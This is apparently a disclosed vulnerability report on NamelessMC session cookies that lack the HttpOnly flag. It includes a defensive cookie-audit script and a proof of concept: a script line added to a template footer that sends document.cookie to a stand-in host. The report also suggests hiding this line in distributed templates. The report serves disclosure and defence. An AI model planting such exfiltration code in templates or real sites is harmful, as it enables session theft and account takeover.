Sensitive Cookie Without 'HttpOnly' Flag in namelessmc/nameless

Valid

Reported on

Oct 23rd 2021


Description

Due to a combination of factors in the design of the authentication and authorization system and a lack of proper cookie settings, it is possible for a malicious user to exfiltrate session tokens from a NamelessMC instance and aggregate them in a remote service.

A malicious administrative user can use NamelessMC's built-in template system either to inject arbitrary JS into a single instance, or to create and distribute a template that administrative users on other instances may install.

This issue stems primarily from the lack of the HttpOnly flag on cookies and from improper validation of the session, which does not ensure that a session cannot be shared with another entity.
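
A quick way to check an instance for the root cause above is to audit the Set-Cookie headers it returns. The following is an added example, not code from the report or from NamelessMC; the cookie names and header values are constructed samples, and the checks cover HttpOnly (the flag this report is about) together with Secure and SameSite, which a hardened session cookie should also carry.

```python
"""Audit Set-Cookie headers for HttpOnly, Secure and SameSite.
Added example; the sample headers are constructed, not captured."""
from __future__ import annotations


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie value into name, value and an attribute map.
    Attribute names are lower-cased; flag attributes map to True."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if val else True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def audit_cookie(header: str) -> list[str]:
    """Return the list of findings for one Set-Cookie header (empty = pass)."""
    attrs = parse_set_cookie(header)["attrs"]
    findings = []
    if "httponly" not in attrs:
        findings.append("missing HttpOnly: readable via document.cookie")
    if "secure" not in attrs:
        findings.append("missing Secure: sent over plain HTTP")
    samesite = attrs.get("samesite")
    if samesite is None or samesite is True or samesite.lower() == "none":
        findings.append("SameSite absent or None: sent on cross-site requests")
    return findings


def audit_response_headers(headers: list[tuple[str, str]]) -> dict[str, list[str]]:
    """Audit every Set-Cookie header in a (name, value) list, keyed by cookie name."""
    return {
        parse_set_cookie(v)["name"]: audit_cookie(v)
        for n, v in headers
        if n.lower() == "set-cookie"
    }


# Constructed sample: a session cookie set without any flags, next to the
# hardened form a fixed instance should return.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html"),
    ("Set-Cookie", "session=abc123; Path=/"),
    ("Set-Cookie", "hardened_session=def456; Path=/; Secure; HttpOnly; SameSite=Lax"),
]

if __name__ == "__main__":
    for cookie, findings in audit_response_headers(SAMPLE_HEADERS).items():
        print(cookie, "OK" if not findings else "; ".join(findings))
```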

Proof of Concept

Edit the active template as an administrator, and add the following code to the footer.tpl file.

<script>
    fetch('https://example.com?referrer='+encodeURIComponent(window.location.href)+'&cookies='+document.cookie);
</script>

Now, imagine someone creating a desirable template for the software and making it available for others to download. It would be trivial to hide such code within a template, and anyone who installs it on their system would then be sending cookie values over the wire to an attacker-controlled server. A user with a popular existing template could also make modifications and submit an update that others would then install.

Impact

This vulnerability allows a malicious actor to log in as any user of the software once tokens have been exfiltrated.

We have contacted a member of the namelessmc/nameless team and are waiting to hear back (2 years ago)
Dane Everitt modified the report (2 years ago)
Dane Everitt modified the report (2 years ago)
namelessmc/nameless maintainer validated this vulnerability (2 years ago)
Dane Everitt has been awarded the disclosure bounty
The fix bounty is now up for grabs
namelessmc/nameless maintainer marked this as fixed with commit a65cc3 (2 years ago)
The fix bounty has been dropped
This vulnerability will not receive a CVE